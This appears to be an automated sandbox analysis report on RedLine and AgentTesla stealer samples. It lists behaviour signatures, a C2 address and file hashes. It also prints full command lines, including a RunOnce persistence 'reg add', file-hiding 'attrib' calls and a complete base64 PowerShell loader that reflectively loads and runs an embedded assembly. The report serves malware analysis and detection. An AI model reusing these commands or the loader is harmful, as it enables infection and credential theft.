Analysis Overview
SHA256
4d530eb7103ec1921ee6d96f8ce1d198383e37c031d48e7f370075f64fd23e8c
Threat Level: Known bad
The file 4d530eb7103ec1921ee6d96f8ce1d198383e37c031d48e7f370075f64fd23e8c was found to be: Known bad.
Malicious Activity Summary
RedLine payload
Agenttesla family
RedLine
Redline family
AgentTesla
Sets file to hidden
Executes dropped EXE
Loads dropped DLL
Adds Run key to start application
Accesses Microsoft Outlook profiles
Suspicious use of SetThreadContext
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Views/modifies file attributes
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: CmdExeWriteProcessMemorySpam
outlook_win_path
outlook_office_path
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-09 19:11
Signatures
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-09 19:11
Reported
2024-11-09 19:14
Platform
win10v2004-20241007-en
Max time kernel
137s
Max time network
146s
Command Line
Signatures
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1916 set thread context of 3792 | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat"
C:\Windows\system32\attrib.exe
attrib +s +h "C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat".exe
C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe
"C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat".exe -wIn 1 -enC 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
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
C:\Windows\system32\attrib.exe
attrib -s -h "C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat".exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 63.141.237.204:7701 | N/A | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.209.201.84.in-addr.arpa | udp |
| US | 63.141.237.204:7701 | N/A | tcp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 63.141.237.204:7701 | N/A | tcp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 63.141.237.204:7701 | N/A | tcp |
| US | 63.141.237.204:7701 | N/A | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe
| MD5 | 04029e121a0cfa5991749937dd22a1d9 |
| SHA1 | f43d9bb316e30ae1a3494ac5b0624f6bea1bf054 |
| SHA256 | 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f |
| SHA512 | 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b |
memory/1916-4-0x00007FFD99713000-0x00007FFD99715000-memory.dmp
memory/1916-5-0x00007FFD99710000-0x00007FFD9A1D1000-memory.dmp
memory/1916-16-0x00007FFD99710000-0x00007FFD9A1D1000-memory.dmp
memory/1916-11-0x000002A67D660000-0x000002A67D682000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nsof1jje.ogt.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1916-17-0x000002A67FD10000-0x000002A67FF44000-memory.dmp
memory/1916-18-0x000002A618000000-0x000002A61819E000-memory.dmp
memory/1916-19-0x000002A67FC30000-0x000002A67FCEE000-memory.dmp
memory/1916-20-0x000002A67D710000-0x000002A67D7A2000-memory.dmp
memory/3792-21-0x0000000000400000-0x00000000004C6000-memory.dmp
memory/3792-24-0x00007FFD99710000-0x00007FFD9A1D1000-memory.dmp
memory/3792-26-0x00007FFD99710000-0x00007FFD9A1D1000-memory.dmp
memory/3792-25-0x000001DA24E20000-0x000001DA24F1C000-memory.dmp
memory/3792-27-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-40-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-38-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-48-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-84-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-78-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-76-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-82-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-88-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-86-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-80-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-74-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-70-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-68-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-67-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-64-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-60-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-58-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-56-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-54-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-52-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-72-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-62-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-50-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-46-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-44-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-42-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-36-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-34-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-32-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-30-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-28-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/1916-1781-0x00007FFD99710000-0x00007FFD9A1D1000-memory.dmp
memory/3792-2354-0x000001DA24F20000-0x000001DA24F92000-memory.dmp
memory/3792-2355-0x000001DA24F90000-0x000001DA25000000-memory.dmp
memory/3792-2356-0x00007FFD99710000-0x00007FFD9A1D1000-memory.dmp
memory/3792-2357-0x000001DA25040000-0x000001DA2508C000-memory.dmp
memory/3792-2358-0x00007FFD99710000-0x00007FFD9A1D1000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-11-09 19:11
Reported
2024-11-09 19:14
Platform
win7-20241023-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9 = "C:\\Users\\Admin\\AppData\\Roaming\\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat" | C:\Windows\system32\reg.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat"
C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce /f /v fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9 /d "C:\Users\Admin\AppData\Roaming\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat"
C:\Windows\system32\attrib.exe
attrib +s +h "C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat".exe
C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe
"C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat".exe -wIn 1 -enC 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
C:\Windows\system32\attrib.exe
attrib -s -h "C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat".exe
Network
Files
C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe
| MD5 | 92f44e405db16ac55d97e3bfe3b132fa |
| SHA1 | 04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d |
| SHA256 | 6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7 |
| SHA512 | f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f |
memory/2452-6-0x0000000074901000-0x0000000074902000-memory.dmp
memory/2452-7-0x0000000074900000-0x0000000074EAB000-memory.dmp
memory/2452-8-0x0000000074900000-0x0000000074EAB000-memory.dmp
memory/2452-9-0x0000000074900000-0x0000000074EAB000-memory.dmp
memory/2452-10-0x0000000074900000-0x0000000074EAB000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-11-09 19:11
Reported
2024-11-09 19:14
Platform
win10v2004-20241007-en
Max time kernel
93s
Max time network
136s
Command Line
Signatures
AgentTesla
Agenttesla family
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9 = "C:\\Users\\Admin\\AppData\\Roaming\\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat" | C:\Windows\system32\reg.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1764 set thread context of 4904 | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat"
C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce /f /v fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9 /d "C:\Users\Admin\AppData\Roaming\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat"
C:\Windows\system32\attrib.exe
attrib +s +h "C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat".exe
C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe
"C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat".exe -wIn 1 -enC JABlAHgAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQA7ACAAJABsAGUAbgAgAD0AIAAkAGUAeABlAC4ATABlAG4AZwB0AGgAOwAkAGwAZQBuACAAPQAgACQAbABlAG4AIAAtACAANAA7ACQAVwBlAGIAVABpAHQAbABlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAOwAgAGYAbwByAGUAYQBjAGgAIAAoACQAbABpAG4AZQAgAGkAbgAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAJABlAHgAZQAuAFIAZQBtAG8AdgBlACgAJABsAGUAbgApACkAKQAgAHsAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgAgACMAKgAnACkAIAB7ACAAIAAkAFcAZQBiAFQAaQB0AGwAZQAuAEEAcABwAGUAbgBkACgAJABsAGkAbgBlAC4AUwBwAGwAaQB0ACgAJwAjACcAKQBbADEAXQApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9ACAAfQA7ACAAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBlAGIAVABpAHQAbABlAC4AVABvAFMAdAByAGkAbgBnACgAKQApADsAJABpAG4AcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAGIAeQB0AGUAcwAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABnAHoAaQBwAFMAdAByAGUAYQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAGkAbgBwAHUAdAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAkAGkAbgBwAHUAdAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAGIAeQB0AGUAcwAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkAOwAgACQAbQBlAHQAaABvAGQASQBuAGYAbwAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgACQAaQBuAHMAdABhAG4AYwBlACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4AQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAJABtAGUAdABoAG8AZABJAG4AZgBvAC4ATgBhAG0AZQApADsAIAAkAG0AZQB0AGgAbwBkAEkAbgBmAG8ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAkAG4AdQBsAGwAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\system32\attrib.exe
attrib -s -h "C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat".exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe
| MD5 | c32ca4acfcc635ec1ea6ed8a34df5fac |
| SHA1 | f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919 |
| SHA256 | 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70 |
| SHA512 | 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc |
memory/1764-6-0x000000007514E000-0x000000007514F000-memory.dmp
memory/1764-7-0x0000000004760000-0x0000000004796000-memory.dmp
memory/1764-8-0x0000000004DD0000-0x00000000053F8000-memory.dmp
memory/1764-9-0x0000000075140000-0x00000000758F0000-memory.dmp
memory/1764-10-0x0000000075140000-0x00000000758F0000-memory.dmp
memory/1764-11-0x0000000004C10000-0x0000000004C32000-memory.dmp
memory/1764-12-0x0000000004CC0000-0x0000000004D26000-memory.dmp
memory/1764-13-0x0000000005400000-0x0000000005466000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5vl3b3ya.ubb.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1764-23-0x00000000055F0000-0x0000000005944000-memory.dmp
memory/1764-24-0x0000000005B10000-0x0000000005B2E000-memory.dmp
memory/1764-25-0x0000000005B40000-0x0000000005B8C000-memory.dmp
memory/1764-26-0x0000000007250000-0x00000000078CA000-memory.dmp
memory/1764-27-0x0000000006040000-0x000000000605A000-memory.dmp
memory/1764-28-0x0000000006DD0000-0x0000000006F72000-memory.dmp
memory/1764-29-0x0000000006F70000-0x000000000706A000-memory.dmp
memory/1764-30-0x00000000060F0000-0x000000000610A000-memory.dmp
memory/1764-31-0x0000000007170000-0x0000000007202000-memory.dmp
memory/4904-32-0x0000000000400000-0x0000000000430000-memory.dmp
memory/4904-35-0x0000000075140000-0x00000000758F0000-memory.dmp
memory/4904-36-0x0000000005930000-0x0000000005ED4000-memory.dmp
memory/4904-37-0x0000000075140000-0x00000000758F0000-memory.dmp
memory/4904-38-0x00000000065D0000-0x0000000006662000-memory.dmp
memory/4904-39-0x00000000067B0000-0x00000000067BA000-memory.dmp
memory/1764-40-0x0000000075140000-0x00000000758F0000-memory.dmp
memory/4904-41-0x0000000006860000-0x00000000068B0000-memory.dmp
memory/4904-42-0x0000000006A80000-0x0000000006C42000-memory.dmp
memory/4904-43-0x0000000075140000-0x00000000758F0000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-09 19:11
Reported
2024-11-09 19:14
Platform
win7-20240903-en
Max time kernel
119s
Max time network
123s
Command Line
Signatures
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe | N/A |
Suspicious behavior: EnumeratesProcesses
